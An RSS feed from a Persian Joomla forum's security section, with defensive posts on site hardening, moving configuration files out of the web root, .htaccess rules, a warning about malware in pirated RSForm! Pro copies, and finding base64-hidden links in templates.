<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[پارس جوم ::  انجمن های تخصصی جوملا - آموزش امنیت ]]></title>
		<link>https://forums.parsjoom.ir/</link>
		<description><![CDATA[پارس جوم ::  انجمن های تخصصی جوملا - https://forums.parsjoom.ir]]></description>
		<pubDate>Sat, 19 Sep 2026 04:33:35 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[تست امنیت رایگان تخصصی روی سایت]]></title>
			<link>https://forums.parsjoom.ir/thread-20770.html</link>
			<pubDate>Mon, 19 Jun 2017 17:25:49 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-20770.html</guid>
			<description><![CDATA[تست امنیت رایگان تخصصی روی سایت<br />
<br />
سلام دوستان<br />
<br />
 <br />
تست نفوذ چیست؟<br />
<br />
به نقل از ویکی پدیا:<br />
<br />
آزمون نفوذپذیری یا آزمون نفوذ (به انگلیسی: Penetration test) روشی برای تخمین میزان امنیت یک کامپیوتر (معمولاً سرور) یا یک شبکه است که با شبیه‌سازی حملات یک حمله‌کننده (هکر) صورت می‌گیرد. در این روش تمام سیستم و نرم‌افزارها و سرویس‌های نصب شده روی آن برای یافتن مشکلات امنیتی آزمایش می‌شوند و سپس اقدام به رفع مشکلات موجود می‌شود.<br />
<br />
در این جا شما می توانید ادرس سایت هایتان را از طریق نظرات برای ما بفرستید تا ما سایت شما را از لحاظ امنیتی بررسی کرده و گزارش جامع و کاملی با ذکر ایرادات سایت شما از لحاظ امنیتی و راهکار هایی را برای حل مشکلات امنیتی ارائه دهیم.<br />
<br />
امید بر آن است بتوانیم با این کار کمک بزرگی به وبمستران عزیز کرده باشیم و انها را از وضعیت ایمن بودن سایتشان آگاه کنیم.<br />
<br />
تست امنیت (تست نفوذ) روی سایت های شما به صورت کاملا رایگان در سریع ترین زمان ممکن انجام خواهد شد،و نتیجه به ایمیل شما فرستاده خواهد شد.<br />
<br />
هدف ما از این کار جلوگیری از هک شدن سایت های وردپرسی،جوملایی،پرستا شاپ،ویبولتین و سایر سیستم های مدیریت محتوا (cms) می باشد.<br />
<br />
 <br />
<br />
امیدوارم با این کار توانسته باشیم به شما وبمستران عزیز کمکی کرده باشیم.<br />
<br />
با تشکر<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
]]></description>
			<content:encoded><![CDATA[تست امنیت رایگان تخصصی روی سایت<br />
<br />
سلام دوستان<br />
<br />
 <br />
تست نفوذ چیست؟<br />
<br />
به نقل از ویکی پدیا:<br />
<br />
آزمون نفوذپذیری یا آزمون نفوذ (به انگلیسی: Penetration test) روشی برای تخمین میزان امنیت یک کامپیوتر (معمولاً سرور) یا یک شبکه است که با شبیه‌سازی حملات یک حمله‌کننده (هکر) صورت می‌گیرد. در این روش تمام سیستم و نرم‌افزارها و سرویس‌های نصب شده روی آن برای یافتن مشکلات امنیتی آزمایش می‌شوند و سپس اقدام به رفع مشکلات موجود می‌شود.<br />
<br />
در این جا شما می توانید ادرس سایت هایتان را از طریق نظرات برای ما بفرستید تا ما سایت شما را از لحاظ امنیتی بررسی کرده و گزارش جامع و کاملی با ذکر ایرادات سایت شما از لحاظ امنیتی و راهکار هایی را برای حل مشکلات امنیتی ارائه دهیم.<br />
<br />
امید بر آن است بتوانیم با این کار کمک بزرگی به وبمستران عزیز کرده باشیم و انها را از وضعیت ایمن بودن سایتشان آگاه کنیم.<br />
<br />
تست امنیت (تست نفوذ) روی سایت های شما به صورت کاملا رایگان در سریع ترین زمان ممکن انجام خواهد شد،و نتیجه به ایمیل شما فرستاده خواهد شد.<br />
<br />
هدف ما از این کار جلوگیری از هک شدن سایت های وردپرسی،جوملایی،پرستا شاپ،ویبولتین و سایر سیستم های مدیریت محتوا (cms) می باشد.<br />
<br />
 <br />
<br />
امیدوارم با این کار توانسته باشیم به شما وبمستران عزیز کمکی کرده باشیم.<br />
<br />
با تشکر<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[امنیت جوملا با انتقال پوشه های logs و tmp و فایل configuration.php]]></title>
			<link>https://forums.parsjoom.ir/thread-19744.html</link>
			<pubDate>Thu, 02 Jun 2016 16:22:06 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-19744.html</guid>
			<description><![CDATA[یکی از مهم ترین اقدامات جهت تامین امنیت سایت هایی که با جوملا ساخته شده اند انتقال پوشه های logs و tmp و فایل configuration.php به خارج از public_html می باشد.<br />
برای این منظور در جوملا 3.5 به صورت زیر عمل کنید.<br />
<br />
انتقال پوشه های logs و tmp<br />
وارد کنترل پنل دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
 خود شوید. (سی پنل، دایرکت ادمین و یا... فرق نمی کند)<br />
ابتدا یک پوشه جدید با نام دلخواه در روت دامنه ایجاد میکنیم. مثال: test1 (منظور از روت دامنه جایی است که فایل ها و پوشه هاتون قبل از پوشه public_html باشد.)<br />
درون پوشه ای که ایجاد کرده اید. دو پوشه دیگر یکی با نام logs و دیگری با نام tmp ایجاد میکنیم.<br />
در روت سایت (یعنی شاخه public_html ) فایل configuration.php رو باز می کنیم. (منظور از روت سایت جایی است که فایل ها و پوشه های جوملا را برای نصب آپلود کردید که معمولا درون پوشه public_html می باشد.)<br />
در خط public &#36;log_path آدرس جدید پوشه logs رو که ساخته اید وارد می کنیم. مثال: home/userxxxx/test1/logs<br />
و در خط p&#36;tmp_path آدرس جدید پوشه tmp رو که ساخته اید وارد می کنیم. مثال: home/userxxxx/test1/tmp<br />
در مسیر که به عنوان مثال آورده شده به جای userxxxx می بایست یوزر مسیر هاست خود را وارد کنید.<br />
تغییرات رو ذخیره می کنیم. برای مطمئن شدن از صحت عملکردتون به مدیریت جوملای خود بروید. قسمت اطلاعات سیستم سپس در قسمت مجوزهای پوشه مقادیر پوشه ثبت وقایع و پوشه موقت باید به رنگ سبز باشد.<br />
<br />
انتقال فایل configuration.php<br />
<br />
ساخت یک پوشه با نام دلخواه در روت دامنه. مثال: test2<br />
فایل configuration.php موجود در روت سایت را کپی کنید درون این پوشه که ساختید.<br />
سپس به 2 فایل defines.php واقع در مسیر public_html/includes/defines.php و مسیر administrator/includes/defines.php بروید و در هر دو مسیر فایل defines.php را جهت ویرایش باز کنید و به جای کد زیر<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>define('JPATH_CONFIGURATION', JPATH_ROOT);</code></div></div>
<br />
کد زیر را جایگزین نمایید و به جای test2 نام پوشه ای که فایل configuration.php را درون آن کپی کردید بنویسید<br />
<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>define('JPATH_CONFIGURATION', JPATH_ROOT . DIRECTORY_SEPARATOR .'..'. DIRECTORY_SEPARATOR . 'test2');</code></div></div>
و فایل را ذخیره کنید.<br />
<br />
با انجام این دو مورد امنیت سایت جوملایی شما قوی تر خواهد رفت.<br />
<br />
<br />
موفق باشید<br />
منبع: دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
]]></description>
			<content:encoded><![CDATA[یکی از مهم ترین اقدامات جهت تامین امنیت سایت هایی که با جوملا ساخته شده اند انتقال پوشه های logs و tmp و فایل configuration.php به خارج از public_html می باشد.<br />
برای این منظور در جوملا 3.5 به صورت زیر عمل کنید.<br />
<br />
انتقال پوشه های logs و tmp<br />
وارد کنترل پنل دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
 خود شوید. (سی پنل، دایرکت ادمین و یا... فرق نمی کند)<br />
ابتدا یک پوشه جدید با نام دلخواه در روت دامنه ایجاد میکنیم. مثال: test1 (منظور از روت دامنه جایی است که فایل ها و پوشه هاتون قبل از پوشه public_html باشد.)<br />
درون پوشه ای که ایجاد کرده اید. دو پوشه دیگر یکی با نام logs و دیگری با نام tmp ایجاد میکنیم.<br />
در روت سایت (یعنی شاخه public_html ) فایل configuration.php رو باز می کنیم. (منظور از روت سایت جایی است که فایل ها و پوشه های جوملا را برای نصب آپلود کردید که معمولا درون پوشه public_html می باشد.)<br />
در خط public &#36;log_path آدرس جدید پوشه logs رو که ساخته اید وارد می کنیم. مثال: home/userxxxx/test1/logs<br />
و در خط p&#36;tmp_path آدرس جدید پوشه tmp رو که ساخته اید وارد می کنیم. مثال: home/userxxxx/test1/tmp<br />
در مسیر که به عنوان مثال آورده شده به جای userxxxx می بایست یوزر مسیر هاست خود را وارد کنید.<br />
تغییرات رو ذخیره می کنیم. برای مطمئن شدن از صحت عملکردتون به مدیریت جوملای خود بروید. قسمت اطلاعات سیستم سپس در قسمت مجوزهای پوشه مقادیر پوشه ثبت وقایع و پوشه موقت باید به رنگ سبز باشد.<br />
<br />
انتقال فایل configuration.php<br />
<br />
ساخت یک پوشه با نام دلخواه در روت دامنه. مثال: test2<br />
فایل configuration.php موجود در روت سایت را کپی کنید درون این پوشه که ساختید.<br />
سپس به 2 فایل defines.php واقع در مسیر public_html/includes/defines.php و مسیر administrator/includes/defines.php بروید و در هر دو مسیر فایل defines.php را جهت ویرایش باز کنید و به جای کد زیر<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>define('JPATH_CONFIGURATION', JPATH_ROOT);</code></div></div>
<br />
کد زیر را جایگزین نمایید و به جای test2 نام پوشه ای که فایل configuration.php را درون آن کپی کردید بنویسید<br />
<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>define('JPATH_CONFIGURATION', JPATH_ROOT . DIRECTORY_SEPARATOR .'..'. DIRECTORY_SEPARATOR . 'test2');</code></div></div>
و فایل را ذخیره کنید.<br />
<br />
با انجام این دو مورد امنیت سایت جوملایی شما قوی تر خواهد رفت.<br />
<br />
<br />
موفق باشید<br />
منبع: دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[آموزش های یاسین دیزاین ( امنیت در جوملا )]]></title>
			<link>https://forums.parsjoom.ir/thread-16770.html</link>
			<pubDate>Wed, 03 Dec 2014 09:37:01 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-16770.html</guid>
			<description><![CDATA[<span style="color: #FF0000;">آموزش های یاسین دیزاین ( امنیت در جوملا )</span><br />
با سلام<br />
امروز آموزشی در زمینه امنیت جوملا را براتون آماده کردم که امیدوارم به دردتون بخوره و ما را هم دعا کنید <img src="images/smils1/tongue.gif" style="vertical-align: middle;" border="0" alt="Tongue" title="Tongue" /><br />
لطفا در صورت انتشار این مطلب در سایت های دیگر منبع این آموزش را به این صورت ذکر کنید <br />
<span style="color: #C71585;">منبع : انجمن های تخصصی پارس جوم – نویسنده : یاسین دیزاین</span><br />
<br />
خب میریم سراغ آموزش<br />
برای امنیت در جوملا به جز بحث امنیت هاست که به ما ربطی نداره (دست ما نیست که بتونیم درست کنیم) بحث ترفندهای فایل های جوملا هست که با این روش ها میتونیم از نفوذ هکرها بسیار جلوگیری کنیم.<br />
<br />
<span style="color: #FF0000;">بحث اول</span> تغییر پوشه ادمین جوملا . (خب این بحث را قبلا آموزش دادم)<br />
اینم لینک این آموزش : دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
<span style="color: #FF0000;">بحث دوم</span> : تغییر دسترسی پوشه ها و فایل ها<br />
برای قابل ویرایش کردن فولدرها یا فایل‏ها، سطح دسترسی (Permission) را 777 قرار دهید، یعنی باید تمام گزینه‏ها را انتخاب کرده باشید.<br />
همچنین برای غیر قابل ویرایش کردن فایل‏‏ها، سطح دسترسی (Permission) را 644 قرار داده و فولدرها را 755 تنظیم نمایید.<br />
خب برای جوملا باید به صورت زیر عمل کنید.<br />
کلیه پوشه ها را به جز attachment و templates_c به 755 تغییر دهید و کلیه فایل ها به جز configuration.php و htaccsess به 644 تغییر بدین<br />
سطح دسترسی configuration.php را روی 444 بزارید<br />
بحث سوم : استفاده از htaccess. جهت ارتقا امنیت<br />
خب کد  زیر را توی فایل  htaccess قرار بدین.<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>deny from all<br />
&lt;FilesMatch "index.php"&gt;<br />
allow from all<br />
&lt;/FilesMatch&gt;<br />
&lt;FilesMatch "index2.php"&gt;<br />
allow from all<br />
&lt;/FilesMatch&gt;</code></div></div>
<br />
برای اینکه این دستورات در htaccess درست کار کنه  سرور شما باید حداقل از PHP 5.2 استفاده کنه  این دستور میگه که دسترسی خارجی به تمامی فایل ها به غیر از index.php و index2.php بسته باشه . در صورتی که پس از اجرای دستور با مشکلی مواجه شدید میتونید این دستور را حذف کنید اما قائدتا نباید مشکلی پیش بیاد<br />
<span style="color: #0000CD;">نکته : به این روش میتونید  از فایل های ترجمه شده هم محافظت کنید</span><br />
<br />
<span style="color: #FF0000;">بحث چهارم</span> : افزونه هایی که استفاده میکنید را همیشه آپدیت کنید.<br />
<span style="color: #FF0000;">بحث پنجم </span>: افزونه و فایل هایی که استفاده نمیکنید را پاک کنید.<br />
<span style="color: #FF0000;">بحث ششم</span> : فایل های index.html موجود در پوشه ها را پاک نکنید.<br />
<span style="color: #FF0000;">بحث هفتم </span>: فایل config خودتون را کد کنین<br />
شما میتونید این فایل را که تمامی مشخصات شما در آن قرار دارد کد کنید  . میدونم که  کد شکن همه نرم افزار ها موجود هست ولی باز هم کار را یکم  برای هکر سخت میکنه.<br />
<br />
در هنگام خرید هاست باید به مواردی که مربوط به تنظیمات سرور است دقت کنید ازجمله به موارد زیر<br />
<br />
1.قبل از خرید هاست از سرپرست سرور بپرسید که آیا در PHP از su_php استفاده میکنند با نه  ؟ استفاده از این حالت به معنای اینه که فایل های موجود در هاست شما تحت کنترل خود دارنده اکانت که شما باشید هست  و نیازی به تنظیمات GLOBAL نیست به زبان ساده تر در این حالت سطح دسترسی 755 توسط اسکریپت قابل نگارش تشخیص داده میشه  و نیازی نیست که شما این سطح دسترسی ها را به 777 تغییر دهید . وقتی دسترسی یک پوشه را روی 777 قرار میدید یعنی اینکه محتویات آن را برای عموم آزاد کرده اید !<br />
<br />
1-2 register_globals در سرور که سایت جوملایی روی آن قرار دارد باید خاموش باشد<br />
<br />
1-3 safe_mode در سروری که یک سایت جوملایی بر روی آن قرار دارد باید خاموش باشد<br />
<br />
1-4 گزینه allow_url_fopen در سروری که یک سایت جوملایی بر روی آن قرار دارد باید خاموش باشد<br />
<br />
1-5 allow_url_include در سروری که یک سایت جوملایی بر روی آن قرار دارد باید خاموش باشد<br />
<br />
1-6 گزینه disable_functions در سروری که یک سایت جوملایی روی ان قرار دارد باید فعال باشد<br />
<br />
1-7 همین موارد هم باید برای open_basedir صدق میکند منتها اگر سرور از su_php استفاده کرده باشه این گزینه دیگر دارای اهمیت نیست<br />
<br />
2. یکی دیگر از مواردی که در هنگام خرید هاست باید از سرپرست فنی سرور بپرسید اینه که آیا بر روی سرور برنامه های امنیتی مثل آنتی شل نصب است یا خیر ؟ شل ها برنامه های کوچکی هستند به هکر ها قدرت دسترسی به برخی منابع را میدهند . اگر جواب سرپرست سرور بلی بود اسم برنامه را هم بپرسید و در مورد اون برنامه تحقیق کنید . هزینه این برنامه برای سرور ها بسیار بالاست  تا 300 دلار هم میرسه  به همین دلیل برخی سرور ها این کار را انجام نمیدن.<br />
<br />
3- از سرپرست هاست بپرسید که آیا برای ورود به phpmyadmin دوباره نام کاربری و رمز عبور پرسیده میشه یا نه ؟<br />
<br />
<span style="color: #FF4500;">در نهایت هر سوالی در این زمینه داشتید بپرسید. جواب میدم.<br />
ممکنه یه سری چیزا را الان فراموش کرده باشم ولی اگه بپرسید حتما همینجا جوابتونو میدم.<br />
همگی موفق و پیروز باشید</span><br />
بزن لایکو <img src="images/smils1/bravo.gif" style="vertical-align: middle;" border="0" alt="Bravo" title="Bravo" />]]></description>
			<content:encoded><![CDATA[<span style="color: #FF0000;">آموزش های یاسین دیزاین ( امنیت در جوملا )</span><br />
با سلام<br />
امروز آموزشی در زمینه امنیت جوملا را براتون آماده کردم که امیدوارم به دردتون بخوره و ما را هم دعا کنید <img src="images/smils1/tongue.gif" style="vertical-align: middle;" border="0" alt="Tongue" title="Tongue" /><br />
لطفا در صورت انتشار این مطلب در سایت های دیگر منبع این آموزش را به این صورت ذکر کنید <br />
<span style="color: #C71585;">منبع : انجمن های تخصصی پارس جوم – نویسنده : یاسین دیزاین</span><br />
<br />
خب میریم سراغ آموزش<br />
برای امنیت در جوملا به جز بحث امنیت هاست که به ما ربطی نداره (دست ما نیست که بتونیم درست کنیم) بحث ترفندهای فایل های جوملا هست که با این روش ها میتونیم از نفوذ هکرها بسیار جلوگیری کنیم.<br />
<br />
<span style="color: #FF0000;">بحث اول</span> تغییر پوشه ادمین جوملا . (خب این بحث را قبلا آموزش دادم)<br />
اینم لینک این آموزش : دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
<span style="color: #FF0000;">بحث دوم</span> : تغییر دسترسی پوشه ها و فایل ها<br />
برای قابل ویرایش کردن فولدرها یا فایل‏ها، سطح دسترسی (Permission) را 777 قرار دهید، یعنی باید تمام گزینه‏ها را انتخاب کرده باشید.<br />
همچنین برای غیر قابل ویرایش کردن فایل‏‏ها، سطح دسترسی (Permission) را 644 قرار داده و فولدرها را 755 تنظیم نمایید.<br />
خب برای جوملا باید به صورت زیر عمل کنید.<br />
کلیه پوشه ها را به جز attachment و templates_c به 755 تغییر دهید و کلیه فایل ها به جز configuration.php و htaccsess به 644 تغییر بدین<br />
سطح دسترسی configuration.php را روی 444 بزارید<br />
بحث سوم : استفاده از htaccess. جهت ارتقا امنیت<br />
خب کد  زیر را توی فایل  htaccess قرار بدین.<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>deny from all<br />
&lt;FilesMatch "index.php"&gt;<br />
allow from all<br />
&lt;/FilesMatch&gt;<br />
&lt;FilesMatch "index2.php"&gt;<br />
allow from all<br />
&lt;/FilesMatch&gt;</code></div></div>
<br />
برای اینکه این دستورات در htaccess درست کار کنه  سرور شما باید حداقل از PHP 5.2 استفاده کنه  این دستور میگه که دسترسی خارجی به تمامی فایل ها به غیر از index.php و index2.php بسته باشه . در صورتی که پس از اجرای دستور با مشکلی مواجه شدید میتونید این دستور را حذف کنید اما قائدتا نباید مشکلی پیش بیاد<br />
<span style="color: #0000CD;">نکته : به این روش میتونید  از فایل های ترجمه شده هم محافظت کنید</span><br />
<br />
<span style="color: #FF0000;">بحث چهارم</span> : افزونه هایی که استفاده میکنید را همیشه آپدیت کنید.<br />
<span style="color: #FF0000;">بحث پنجم </span>: افزونه و فایل هایی که استفاده نمیکنید را پاک کنید.<br />
<span style="color: #FF0000;">بحث ششم</span> : فایل های index.html موجود در پوشه ها را پاک نکنید.<br />
<span style="color: #FF0000;">بحث هفتم </span>: فایل config خودتون را کد کنین<br />
شما میتونید این فایل را که تمامی مشخصات شما در آن قرار دارد کد کنید  . میدونم که  کد شکن همه نرم افزار ها موجود هست ولی باز هم کار را یکم  برای هکر سخت میکنه.<br />
<br />
در هنگام خرید هاست باید به مواردی که مربوط به تنظیمات سرور است دقت کنید ازجمله به موارد زیر<br />
<br />
1.قبل از خرید هاست از سرپرست سرور بپرسید که آیا در PHP از su_php استفاده میکنند با نه  ؟ استفاده از این حالت به معنای اینه که فایل های موجود در هاست شما تحت کنترل خود دارنده اکانت که شما باشید هست  و نیازی به تنظیمات GLOBAL نیست به زبان ساده تر در این حالت سطح دسترسی 755 توسط اسکریپت قابل نگارش تشخیص داده میشه  و نیازی نیست که شما این سطح دسترسی ها را به 777 تغییر دهید . وقتی دسترسی یک پوشه را روی 777 قرار میدید یعنی اینکه محتویات آن را برای عموم آزاد کرده اید !<br />
<br />
1-2 register_globals در سرور که سایت جوملایی روی آن قرار دارد باید خاموش باشد<br />
<br />
1-3 safe_mode در سروری که یک سایت جوملایی بر روی آن قرار دارد باید خاموش باشد<br />
<br />
1-4 گزینه allow_url_fopen در سروری که یک سایت جوملایی بر روی آن قرار دارد باید خاموش باشد<br />
<br />
1-5 allow_url_include در سروری که یک سایت جوملایی بر روی آن قرار دارد باید خاموش باشد<br />
<br />
1-6 گزینه disable_functions در سروری که یک سایت جوملایی روی ان قرار دارد باید فعال باشد<br />
<br />
1-7 همین موارد هم باید برای open_basedir صدق میکند منتها اگر سرور از su_php استفاده کرده باشه این گزینه دیگر دارای اهمیت نیست<br />
<br />
2. یکی دیگر از مواردی که در هنگام خرید هاست باید از سرپرست فنی سرور بپرسید اینه که آیا بر روی سرور برنامه های امنیتی مثل آنتی شل نصب است یا خیر ؟ شل ها برنامه های کوچکی هستند به هکر ها قدرت دسترسی به برخی منابع را میدهند . اگر جواب سرپرست سرور بلی بود اسم برنامه را هم بپرسید و در مورد اون برنامه تحقیق کنید . هزینه این برنامه برای سرور ها بسیار بالاست  تا 300 دلار هم میرسه  به همین دلیل برخی سرور ها این کار را انجام نمیدن.<br />
<br />
3- از سرپرست هاست بپرسید که آیا برای ورود به phpmyadmin دوباره نام کاربری و رمز عبور پرسیده میشه یا نه ؟<br />
<br />
<span style="color: #FF4500;">در نهایت هر سوالی در این زمینه داشتید بپرسید. جواب میدم.<br />
ممکنه یه سری چیزا را الان فراموش کرده باشم ولی اگه بپرسید حتما همینجا جوابتونو میدم.<br />
همگی موفق و پیروز باشید</span><br />
بزن لایکو <img src="images/smils1/bravo.gif" style="vertical-align: middle;" border="0" alt="Bravo" title="Bravo" />]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[رفع چند مشکل امنیتی RSForm! Pro نسخه وارز]]></title>
			<link>https://forums.parsjoom.ir/thread-16666.html</link>
			<pubDate>Sat, 22 Nov 2014 07:17:19 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-16666.html</guid>
			<description><![CDATA[درود<br />
دوستانی که از RSForm! Pro وارز و دانلود شده از سایت های وارز روسی و انجمن های فارسی که بعنوان هدیه این کامپوننت وارز رو منتشر کردند استفاده میکنند مسیر زیر را چک کنند و درصورت موجود بودن فایلی به نام social.png آن را حذف کنند.<br />
<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>/administrator/components/com_rsform/assets/images/social.png</code></div></div>
<br />
و مسیر زیر همچنین :<br />
<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>/public_html/components/com_rsform/assets/images/social.png</code></div></div>
<br />
در این تصویر که به تصاویر اضافه شده و مود نیاز نیست کد مخرب وجود دارد که درصورت منظم شدن نزدیک به پانصد خط کد اینکد شده وجود دارد و حجمش معادل 45 کیلوبایت است.<br />
<br />
<br />
<br />
همچنین در مسیر زیر فایل index.html موجود را چک کنید :<br />
<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>/administrator/components/com_rsform/assets/codemirror/mode/clike/index.html</code></div></div>
<br />
<br />
در کامپوننت اوریجینال این فایل کدهای اصلی قرار دارد که در نسخه های وارز دستکاری شده و کد شده است.]]></description>
			<content:encoded><![CDATA[درود<br />
دوستانی که از RSForm! Pro وارز و دانلود شده از سایت های وارز روسی و انجمن های فارسی که بعنوان هدیه این کامپوننت وارز رو منتشر کردند استفاده میکنند مسیر زیر را چک کنند و درصورت موجود بودن فایلی به نام social.png آن را حذف کنند.<br />
<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>/administrator/components/com_rsform/assets/images/social.png</code></div></div>
<br />
و مسیر زیر همچنین :<br />
<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>/public_html/components/com_rsform/assets/images/social.png</code></div></div>
<br />
در این تصویر که به تصاویر اضافه شده و مود نیاز نیست کد مخرب وجود دارد که درصورت منظم شدن نزدیک به پانصد خط کد اینکد شده وجود دارد و حجمش معادل 45 کیلوبایت است.<br />
<br />
<br />
<br />
همچنین در مسیر زیر فایل index.html موجود را چک کنید :<br />
<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>/administrator/components/com_rsform/assets/codemirror/mode/clike/index.html</code></div></div>
<br />
<br />
در کامپوننت اوریجینال این فایل کدهای اصلی قرار دارد که در نسخه های وارز دستکاری شده و کد شده است.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[حذف کدهای مخرب Base64]]></title>
			<link>https://forums.parsjoom.ir/thread-14679.html</link>
			<pubDate>Thu, 03 Apr 2014 21:52:03 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-14679.html</guid>
			<description><![CDATA[سلام<br />
<br />
امروز مجبور شدم دنبال لینکهای اکسترنال که با Base64 کد شده بودند ، بگردم ...<br />
<br />
خب بعد از اینکه قالب رو دانلود کردم چند تا روش ساده رو رفتم تا لینکها رو پیدا و حذفشون کردم ...<br />
<br />
1 - اول از همه با آنتی ویروس آنلاین قالب رو چک کردم . <br />
<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
<br />
قابلیت آپلود فایل برای چک کردن و همینطور بررسی وبسایت شما رو هم داره .<br />
<br />
2 - لینکهای اکسترنال معمولا یک گوشه ای دوردست از سایت قرار دادن ؛ مثلا در -8000PX سمت راست یا چپ ؛ و لینکی به سایت تبلیغاتی و .... دادند ...<br />
<br />
خب یکی از این لینکها یا متن رو کپی میکنیم ، مثلا ً دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
  و به سایت دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
 برای کد کردن یا باز کردن کد میدیم ... <br />
چیز جالبی که هست برای مثال همون لینک رو شما دوباره به base64 کد میکنید ... چیزی شبیه این دریافت میکنید (  aHR0cDovL2ZvcnVtcy5wYXJzam9vbS5pcg==  )<br />
خب حالا همین متن رو کپی کرده و میبرید به ++Notepad ، از اونجا خیلی راحت میتونید دونه دونه لینکها رو پیدا کنید ...<br />
<br />
<br />
( این یه آموزش نیست ، اولین تجربه من بود که شاید بدرد بخوره )]]></description>
			<content:encoded><![CDATA[سلام<br />
<br />
امروز مجبور شدم دنبال لینکهای اکسترنال که با Base64 کد شده بودند ، بگردم ...<br />
<br />
خب بعد از اینکه قالب رو دانلود کردم چند تا روش ساده رو رفتم تا لینکها رو پیدا و حذفشون کردم ...<br />
<br />
1 - اول از همه با آنتی ویروس آنلاین قالب رو چک کردم . <br />
<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
<br />
قابلیت آپلود فایل برای چک کردن و همینطور بررسی وبسایت شما رو هم داره .<br />
<br />
2 - لینکهای اکسترنال معمولا یک گوشه ای دوردست از سایت قرار دادن ؛ مثلا در -8000PX سمت راست یا چپ ؛ و لینکی به سایت تبلیغاتی و .... دادند ...<br />
<br />
خب یکی از این لینکها یا متن رو کپی میکنیم ، مثلا ً دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
